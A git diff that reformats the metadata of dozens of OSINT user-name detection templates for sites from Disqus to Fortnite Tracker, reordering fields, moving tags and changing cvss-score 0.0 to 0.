b/http/osint/discusselasticco.yaml index 4d8109609b..154b034c31 100644 --- a/http/osint/discusselasticco.yaml +++ b/http/osint/discusselasticco.yaml @@ -3,17 +3,18 @@ id: discusselasticco info: name: Discuss.elastic.co User Name Information - Detect author: dwisiswant0 - description: Discuss.elastic.co user name information check was conducted. severity: info + description: Discuss.elastic.co user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-tech,discusselasticco metadata: max-request: 1 + tags: osint,osint-tech,discusselasticco self-contained: true + http: - method: GET path: diff --git a/http/osint/discusssocial-mastodon-instance.yaml b/http/osint/discusssocial-mastodon-instance.yaml index 99efac21d5..1c82d96251 100644 --- a/http/osint/discusssocial-mastodon-instance.yaml +++ b/http/osint/discusssocial-mastodon-instance.yaml @@ -3,17 +3,18 @@ id: discusssocial-mastodon-instance info: name: Discuss.social (Mastodon Instance) User Name Information - Detect author: dwisiswant0 - description: Discuss.social (Mastodon Instance) user name information check was conducted. severity: info + description: Discuss.social (Mastodon Instance) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,discusssocial-mastodon-instance metadata: max-request: 1 + tags: osint,osint-social,discusssocial-mastodon-instance self-contained: true + http: - method: GET path: diff --git a/http/osint/disqus.yaml b/http/osint/disqus.yaml index b0ea2a806e..d3728e4831 100644 --- a/http/osint/disqus.yaml +++ b/http/osint/disqus.yaml @@ -3,17 +3,18 @@ id: disqus info: name: Disqus User Name Information - Detect author: dwisiswant0 - description: Disqus user name information check was conducted. severity: info + description: Disqus user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,disqus metadata: max-request: 1 + tags: osint,osint-social,disqus self-contained: true + http: - method: GET path: diff --git a/http/osint/dissenter.yaml b/http/osint/dissenter.yaml index 38128fef27..3e0c1e42a6 100644 --- a/http/osint/dissenter.yaml +++ b/http/osint/dissenter.yaml @@ -3,17 +3,18 @@ id: dissenter info: name: Dissenter User Name Information - Detect author: dwisiswant0 - description: Dissenter user name information check was conducted. severity: info + description: Dissenter user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-political,dissenter metadata: max-request: 1 + tags: osint,osint-political,dissenter self-contained: true + http: - method: GET path: diff --git a/http/osint/dockerhub.yaml b/http/osint/dockerhub.yaml index bb7274faff..b13318e996 100644 --- a/http/osint/dockerhub.yaml +++ b/http/osint/dockerhub.yaml @@ -3,17 +3,18 @@ id: dockerhub info: name: DockerHub User Name Information - Detect author: dwisiswant0 - description: DockerHub user name information check was conducted. severity: info + description: DockerHub user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-coding,dockerhub metadata: max-request: 1 + tags: osint,osint-coding,dockerhub self-contained: true + http: - method: GET path: diff --git a/http/osint/dojoverse.yaml b/http/osint/dojoverse.yaml index 9607fcf195..1798b912c8 100644 --- a/http/osint/dojoverse.yaml +++ b/http/osint/dojoverse.yaml @@ -3,17 +3,18 @@ id: dojoverse info: name: Dojoverse User Name Information - Detect author: dwisiswant0 - description: Dojoverse user name information check was conducted. severity: info + description: Dojoverse user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,dojoverse metadata: max-request: 1 + tags: osint,osint-hobby,dojoverse self-contained: true + http: - method: GET path: diff --git a/http/osint/donation-alerts.yaml b/http/osint/donation-alerts.yaml index 77cd532052..f22714ada7 100644 --- a/http/osint/donation-alerts.yaml +++ b/http/osint/donation-alerts.yaml @@ -3,17 +3,18 @@ id: donation-alerts info: name: Donation Alerts User Name Information - Detect author: dwisiswant0 - description: Donation Alerts user name information check was conducted. severity: info + description: Donation Alerts user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-business,donation-alerts metadata: max-request: 1 + tags: osint,osint-business,donation-alerts self-contained: true + http: - method: GET path: diff --git a/http/osint/dotcards.yaml b/http/osint/dotcards.yaml index 31042c2ef1..647e3fbf0d 100644 --- a/http/osint/dotcards.yaml +++ b/http/osint/dotcards.yaml @@ -3,17 +3,18 @@ id: dotcards info: name: Dot.cards User Name Information - Detect author: dwisiswant0 - description: Dot.cards user name information check was conducted. severity: info + description: Dot.cards user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-business,dotcards metadata: max-request: 1 + tags: osint,osint-business,dotcards self-contained: true + http: - method: GET path: diff --git a/http/osint/dribbble.yaml b/http/osint/dribbble.yaml index 6b38e3b25c..358e5d8a21 100644 --- a/http/osint/dribbble.yaml +++ b/http/osint/dribbble.yaml @@ -3,17 +3,18 @@ id: dribbble info: name: Dribbble User Name Information - Detect author: dwisiswant0 - description: Dribbble user name information check was conducted. severity: info + description: Dribbble user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-art,dribbble metadata: max-request: 1 + tags: osint,osint-art,dribbble self-contained: true + http: - method: GET path: diff --git a/http/osint/droners.yaml b/http/osint/droners.yaml index 5d5c8e2916..3e87393606 100644 --- a/http/osint/droners.yaml +++ b/http/osint/droners.yaml @@ -3,17 +3,18 @@ id: droners info: name: Droners User Name Information - Detect author: dwisiswant0 - description: Droners user name information check was conducted. severity: info + description: Droners user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,droners metadata: max-request: 1 + tags: osint,osint-hobby,droners self-contained: true + http: - method: GET path: diff --git a/http/osint/drum.yaml b/http/osint/drum.yaml index 655f7b76b8..481c606280 100644 --- a/http/osint/drum.yaml +++ b/http/osint/drum.yaml @@ -3,17 +3,18 @@ id: drum info: name: Drum User Name Information - Detect author: dwisiswant0 - description: Drum user name information check was conducted. severity: info + description: Drum user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,drum metadata: max-request: 1 + tags: osint,osint-hobby,drum self-contained: true + http: - method: GET path: diff --git a/http/osint/duolingo.yaml b/http/osint/duolingo.yaml index 9bae5cbdf7..56b1306bef 100644 --- a/http/osint/duolingo.yaml +++ b/http/osint/duolingo.yaml @@ -3,17 +3,18 @@ id: duolingo info: name: Duolingo User Name Information - Detect author: dwisiswant0 - description: Duolingo user name information check was conducted. severity: info + description: Duolingo user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,duolingo metadata: max-request: 1 + tags: osint,osint-hobby,duolingo self-contained: true + http: - method: GET path: diff --git a/http/osint/easyen.yaml b/http/osint/easyen.yaml index ac3c981631..4f0bcf0845 100644 --- a/http/osint/easyen.yaml +++ b/http/osint/easyen.yaml @@ -3,17 +3,18 @@ id: easyen info: name: Easyen User Name Information - Detect author: dwisiswant0 - description: Easyen user name information check was conducted. severity: info + description: Easyen user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,easyen metadata: max-request: 1 + tags: osint,osint-social,easyen self-contained: true + http: - method: GET path: diff --git a/http/osint/ebay-stores.yaml b/http/osint/ebay-stores.yaml index 7fc68ed04e..7e4d30249e 100644 --- a/http/osint/ebay-stores.yaml +++ b/http/osint/ebay-stores.yaml @@ -3,17 +3,18 @@ id: ebay-stores info: name: Ebay stores User Name Information - Detect author: dwisiswant0 - description: Ebay stores user name information check was conducted. severity: info + description: Ebay stores user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-shopping,ebay-stores metadata: max-request: 1 + tags: osint,osint-shopping,ebay-stores self-contained: true + http: - method: GET path: diff --git a/http/osint/ebay.yaml b/http/osint/ebay.yaml index ab1661f1f8..631ad12491 100644 --- a/http/osint/ebay.yaml +++ b/http/osint/ebay.yaml @@ -3,17 +3,18 @@ id: ebay info: name: EBay User Name Information - Detect author: dwisiswant0 - description: EBay user name information check was conducted. severity: info + description: EBay user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-shopping,ebay metadata: max-request: 1 + tags: osint,osint-shopping,ebay self-contained: true + http: - method: GET path: diff --git a/http/osint/elloco.yaml b/http/osint/elloco.yaml index 31d4d78635..73c218aa40 100644 --- a/http/osint/elloco.yaml +++ b/http/osint/elloco.yaml @@ -3,17 +3,18 @@ id: elloco info: name: Ello.co User Name Information - Detect author: dwisiswant0 - description: Ello.co user name information check was conducted. severity: info + description: Ello.co user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-art,elloco metadata: max-request: 1 + tags: osint,osint-art,elloco self-contained: true + http: - method: GET path: diff --git a/http/osint/engadget.yaml b/http/osint/engadget.yaml index 9a93865a20..bb50cf165e 100644 --- a/http/osint/engadget.yaml +++ b/http/osint/engadget.yaml @@ -3,17 +3,18 @@ id: engadget info: name: Engadget User Name Information - Detect author: dwisiswant0 - description: Engadget user name information check was conducted. severity: info + description: Engadget user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-tech,engadget metadata: max-request: 1 + tags: osint,osint-tech,engadget self-contained: true + http: - method: GET path: diff --git a/http/osint/eporner.yaml b/http/osint/eporner.yaml index 90e4632b16..c4fa481662 100644 --- a/http/osint/eporner.yaml +++ b/http/osint/eporner.yaml @@ -3,17 +3,18 @@ id: eporner info: name: EPORNER User Name Information - Detect author: dwisiswant0 - description: EPORNER user name information check was conducted. severity: info + description: EPORNER user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,eporner metadata: max-request: 1 + tags: osint,osint-porn,eporner self-contained: true + http: - method: GET path: diff --git a/http/osint/etoro.yaml b/http/osint/etoro.yaml index 6c34cda139..11764de8ab 100644 --- a/http/osint/etoro.yaml +++ b/http/osint/etoro.yaml @@ -3,17 +3,18 @@ id: etoro info: name: EToro User Name Information - Detect author: dwisiswant0 - description: EToro user name information check was conducted. severity: info + description: EToro user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-finance,etoro metadata: max-request: 1 + tags: osint,osint-finance,etoro self-contained: true + http: - method: GET path: diff --git a/http/osint/etsy.yaml b/http/osint/etsy.yaml index fb5c5b2c1c..402f26d2f0 100644 --- a/http/osint/etsy.yaml +++ b/http/osint/etsy.yaml @@ -3,17 +3,18 @@ id: etsy info: name: Etsy User Name Information - Detect author: dwisiswant0 - description: Etsy user name information check was conducted. severity: info + description: Etsy user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-shopping,etsy metadata: max-request: 1 + tags: osint,osint-shopping,etsy self-contained: true + http: - method: GET path: diff --git a/http/osint/expressionalsocial-mastodon-instance.yaml b/http/osint/expressionalsocial-mastodon-instance.yaml index 7e7b955e96..0d91123a1c 100644 --- a/http/osint/expressionalsocial-mastodon-instance.yaml +++ b/http/osint/expressionalsocial-mastodon-instance.yaml @@ -3,17 +3,18 @@ id: expressionalsocial-mastodon-instance info: name: Expressional.social (Mastodon Instance) User Name Information - Detect author: dwisiswant0 - description: Expressional.social (Mastodon Instance) user name information check was conducted. severity: info + description: Expressional.social (Mastodon Instance) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,expressionalsocial-mastodon-instance metadata: max-request: 1 + tags: osint,osint-social,expressionalsocial-mastodon-instance self-contained: true + http: - method: GET path: diff --git a/http/osint/extralunchmoney.yaml b/http/osint/extralunchmoney.yaml index a73dafb437..045ce745ad 100644 --- a/http/osint/extralunchmoney.yaml +++ b/http/osint/extralunchmoney.yaml @@ -3,17 +3,18 @@ id: extralunchmoney info: name: ExtraLunchMoney User Name Information - Detect author: dwisiswant0 - description: ExtraLunchMoney user name information check was conducted. severity: info + description: ExtraLunchMoney user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,extralunchmoney metadata: max-request: 1 + tags: osint,osint-porn,extralunchmoney self-contained: true + http: - method: GET path: diff --git a/http/osint/eyeem.yaml b/http/osint/eyeem.yaml index 635f19c621..829f33a5ce 100644 --- a/http/osint/eyeem.yaml +++ b/http/osint/eyeem.yaml @@ -3,17 +3,18 @@ id: eyeem info: name: Eyeem User Name Information - Detect author: dwisiswant0 - description: Eyeem user name information check was conducted. severity: info + description: Eyeem user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-art,eyeem metadata: max-request: 1 + tags: osint,osint-art,eyeem self-contained: true + http: - method: GET path: diff --git a/http/osint/f3.yaml b/http/osint/f3.yaml index d2326b034b..e320e207d7 100644 --- a/http/osint/f3.yaml +++ b/http/osint/f3.yaml @@ -3,17 +3,18 @@ id: f3 info: name: F3 User Name Information - Detect author: dwisiswant0 - description: F3 user name information check was conducted. severity: info + description: F3 user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,f3 metadata: max-request: 1 + tags: osint,osint-social,f3 self-contained: true + http: - method: GET path: diff --git a/http/osint/fabswingers.yaml b/http/osint/fabswingers.yaml index a19a95cc18..e41f20486c 100644 --- a/http/osint/fabswingers.yaml +++ b/http/osint/fabswingers.yaml @@ -3,17 +3,18 @@ id: fabswingers info: name: Fabswingers User Name Information - Detect author: dwisiswant0 - description: Fabswingers user name information check was conducted. severity: info + description: Fabswingers user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-dating,fabswingers metadata: max-request: 1 + tags: osint,osint-dating,fabswingers self-contained: true + http: - method: GET path: diff --git a/http/osint/facebook-page.yaml b/http/osint/facebook-page.yaml index da022d8143..ce3b1daa5c 100644 --- a/http/osint/facebook-page.yaml +++ b/http/osint/facebook-page.yaml @@ -3,19 +3,20 @@ id: facebook-page info: name: Facebook Page Name Information - Detect author: gpiechnik2 + severity: info description: | Facebook Page name information check was conducted. - severity: info classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: "true" + max-request: 1 tags: osint,osint-business,osint-social self-contained: true + http: - raw: - | diff --git a/http/osint/faktopedia.yaml b/http/osint/faktopedia.yaml index 7a2392f197..a93c3f082f 100644 --- a/http/osint/faktopedia.yaml +++ b/http/osint/faktopedia.yaml @@ -3,17 +3,18 @@ id: faktopedia info: name: Faktopedia User Name Information - Detect author: dwisiswant0 - description: Faktopedia user name information check was conducted. severity: info + description: Faktopedia user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-images,faktopedia metadata: max-request: 1 + tags: osint,osint-images,faktopedia self-contained: true + http: - method: GET path: diff --git a/http/osint/fancentro.yaml b/http/osint/fancentro.yaml index 354d208653..29564dfd5d 100644 --- a/http/osint/fancentro.yaml +++ b/http/osint/fancentro.yaml @@ -3,17 +3,18 @@ id: fancentro info: name: FanCentro User Name Information - Detect author: dwisiswant0 - description: FanCentro user name information check was conducted. severity: info + description: FanCentro user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,fancentro metadata: max-request: 1 + tags: osint,osint-porn,fancentro self-contained: true + http: - method: GET path: diff --git a/http/osint/fandalism.yaml b/http/osint/fandalism.yaml index 1664b75898..44781c2d1a 100644 --- a/http/osint/fandalism.yaml +++ b/http/osint/fandalism.yaml @@ -3,17 +3,18 @@ id: fandalism info: name: Fandalism User Name Information - Detect author: dwisiswant0 - description: Fandalism user name information check was conducted. severity: info + description: Fandalism user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,fandalism metadata: max-request: 1 + tags: osint,osint-hobby,fandalism self-contained: true + http: - method: GET path: diff --git a/http/osint/fandom.yaml b/http/osint/fandom.yaml index 1e380dfdca..e13e755612 100644 --- a/http/osint/fandom.yaml +++ b/http/osint/fandom.yaml @@ -3,17 +3,18 @@ id: fandom info: name: Fandom User Name Information - Detect author: dwisiswant0 - description: Fandom user name information check was conducted. severity: info + description: Fandom user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,fandom metadata: max-request: 1 + tags: osint,osint-gaming,fandom self-contained: true + http: - method: GET path: diff --git a/http/osint/fanpop.yaml b/http/osint/fanpop.yaml index a60b10cc3b..1e6ba09a75 100644 --- a/http/osint/fanpop.yaml +++ b/http/osint/fanpop.yaml @@ -3,17 +3,18 @@ id: fanpop info: name: Fanpop User Name Information - Detect author: dwisiswant0 - description: Fanpop user name information check was conducted. severity: info + description: Fanpop user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,fanpop metadata: max-request: 1 + tags: osint,osint-social,fanpop self-contained: true + http: - method: GET path: diff --git a/http/osint/fansly.yaml b/http/osint/fansly.yaml index 87bb467720..4b6f55bbaf 100644 --- a/http/osint/fansly.yaml +++ b/http/osint/fansly.yaml @@ -3,17 +3,18 @@ id: fansly info: name: Fansly User Name Information - Detect author: dwisiswant0 - description: Fansly user name information check was conducted. severity: info + description: Fansly user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,fansly metadata: max-request: 1 + tags: osint,osint-porn,fansly self-contained: true + http: - method: GET path: diff --git a/http/osint/fark.yaml b/http/osint/fark.yaml index 923cdd5f63..c337854c0b 100644 --- a/http/osint/fark.yaml +++ b/http/osint/fark.yaml @@ -3,17 +3,18 @@ id: fark info: name: Fark User Name Information - Detect author: dwisiswant0 - description: Fark user name information check was conducted. severity: info + description: Fark user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,fark metadata: max-request: 1 + tags: osint,osint-social,fark self-contained: true + http: - method: GET path: diff --git a/http/osint/farkascity.yaml b/http/osint/farkascity.yaml index dae2146271..dd54b7ea71 100644 --- a/http/osint/farkascity.yaml +++ b/http/osint/farkascity.yaml @@ -3,17 +3,18 @@ id: farkascity info: name: Farkascity User Name Information - Detect author: dwisiswant0 - description: Farkascity user name information check was conducted. severity: info + description: Farkascity user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-blog,farkascity metadata: max-request: 1 + tags: osint,osint-blog,farkascity self-contained: true + http: - method: GET path: diff --git a/http/osint/fatsecret.yaml b/http/osint/fatsecret.yaml index 4dccf38543..bf821a851a 100644 --- a/http/osint/fatsecret.yaml +++ b/http/osint/fatsecret.yaml @@ -3,17 +3,18 @@ id: fatsecret info: name: FatSecret User Name Information - Detect author: dwisiswant0 - description: FatSecret user name information check was conducted. severity: info + description: FatSecret user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-health,fatsecret metadata: max-request: 1 + tags: osint,osint-health,fatsecret self-contained: true + http: - method: GET path: diff --git a/http/osint/fcv.yaml b/http/osint/fcv.yaml index 239aae798e..3f94714cdd 100644 --- a/http/osint/fcv.yaml +++ b/http/osint/fcv.yaml @@ -3,17 +3,18 @@ id: fcv info: name: Fcv User Name Information - Detect author: dwisiswant0 - description: Fcv user name information check was conducted. severity: info + description: Fcv user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,fcv metadata: max-request: 1 + tags: osint,osint-hobby,fcv self-contained: true + http: - method: GET path: diff --git a/http/osint/federatedpress-mastodon-instance.yaml b/http/osint/federatedpress-mastodon-instance.yaml index e83ae407ac..0039f88969 100644 --- a/http/osint/federatedpress-mastodon-instance.yaml +++ b/http/osint/federatedpress-mastodon-instance.yaml @@ -3,17 +3,18 @@ id: federatedpress-mastodon-instance info: name: Federated.press (Mastodon Instance) User Name Information - Detect author: dwisiswant0 - description: Federated.press (Mastodon Instance) user name information check was conducted. severity: info + description: Federated.press (Mastodon Instance) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,federatedpress-mastodon-instance metadata: max-request: 1 + tags: osint,osint-social,federatedpress-mastodon-instance self-contained: true + http: - method: GET path: diff --git a/http/osint/figma.yaml b/http/osint/figma.yaml index 6d395ccf17..f289bd696f 100644 --- a/http/osint/figma.yaml +++ b/http/osint/figma.yaml @@ -3,17 +3,18 @@ id: figma info: name: Figma User Name Information - Detect author: dwisiswant0 - description: Figma user name information check was conducted. severity: info + description: Figma user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-tech,figma metadata: max-request: 1 + tags: osint,osint-tech,figma self-contained: true + http: - method: GET path: diff --git a/http/osint/filmweb.yaml b/http/osint/filmweb.yaml index 4aae186f3a..f5f850fd58 100644 --- a/http/osint/filmweb.yaml +++ b/http/osint/filmweb.yaml @@ -3,17 +3,18 @@ id: filmweb info: name: Filmweb User Name Information - Detect author: dwisiswant0 - description: Filmweb user name information check was conducted. severity: info + description: Filmweb user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,filmweb metadata: max-request: 1 + tags: osint,osint-hobby,filmweb self-contained: true + http: - method: GET path: diff --git a/http/osint/fine-art-america.yaml b/http/osint/fine-art-america.yaml index 25c0c24db6..42a1716956 100644 --- a/http/osint/fine-art-america.yaml +++ b/http/osint/fine-art-america.yaml @@ -3,17 +3,18 @@ id: fine-art-america info: name: Fine art america User Name Information - Detect author: dwisiswant0 - description: Fine art america user name information check was conducted. severity: info + description: Fine art america user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-shopping,fine-art-america metadata: max-request: 1 + tags: osint,osint-shopping,fine-art-america self-contained: true + http: - method: GET path: diff --git a/http/osint/fiverr.yaml b/http/osint/fiverr.yaml index 00861445d0..3c896b5e09 100644 --- a/http/osint/fiverr.yaml +++ b/http/osint/fiverr.yaml @@ -3,17 +3,18 @@ id: fiverr info: name: Fiverr User Name Information - Detect author: dwisiswant0 - description: Fiverr user name information check was conducted. severity: info + description: Fiverr user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-shopping,fiverr metadata: max-request: 1 + tags: osint,osint-shopping,fiverr self-contained: true + http: - method: GET path: diff --git a/http/osint/flickr.yaml b/http/osint/flickr.yaml index 12d0ebd62f..9e5f7b514c 100644 --- a/http/osint/flickr.yaml +++ b/http/osint/flickr.yaml @@ -3,17 +3,18 @@ id: flickr info: name: Flickr User Name Information - Detect author: dwisiswant0 - description: Flickr user name information check was conducted. severity: info + description: Flickr user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-images,flickr metadata: max-request: 1 + tags: osint,osint-images,flickr self-contained: true + http: - method: GET path: diff --git a/http/osint/flipboard.yaml b/http/osint/flipboard.yaml index a1885695d4..e15d54a0e3 100644 --- a/http/osint/flipboard.yaml +++ b/http/osint/flipboard.yaml @@ -7,13 +7,14 @@ info: description: Flipboard user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-tech,flipboard metadata: max-request: 1 + tags: osint,osint-tech,flipboard self-contained: true + http: - method: GET path: diff --git a/http/osint/flowcode.yaml b/http/osint/flowcode.yaml index fc3bf74487..a039fbf714 100644 --- a/http/osint/flowcode.yaml +++ b/http/osint/flowcode.yaml @@ -3,17 +3,18 @@ id: flowcode info: name: Flowcode User Name Information - Detect author: dwisiswant0 - description: Flowcode user name information check was conducted. severity: info + description: Flowcode user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,flowcode metadata: max-request: 1 + tags: osint,osint-social,flowcode self-contained: true + http: - method: GET path: diff --git a/http/osint/fodors-forum.yaml b/http/osint/fodors-forum.yaml index dc7f3ed55d..58b2615896 100644 --- a/http/osint/fodors-forum.yaml +++ b/http/osint/fodors-forum.yaml @@ -3,17 +3,18 @@ id: fodors-forum info: name: Fodors Forum User Name Information - Detect author: dwisiswant0 - description: Fodors Forum user name information check was conducted. severity: info + description: Fodors Forum user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,fodors-forum metadata: max-request: 1 + tags: osint,osint-social,fodors-forum self-contained: true + http: - method: GET path: diff --git a/http/osint/fortnite-tracker.yaml b/http/osint/fortnite-tracker.yaml index e96fd8fc09..bd4f3b577d 100644 --- a/http/osint/fortnite-tracker.yaml +++ b/http/osint/fortnite-tracker.yaml @@ -3,17 +3,18 @@ id: 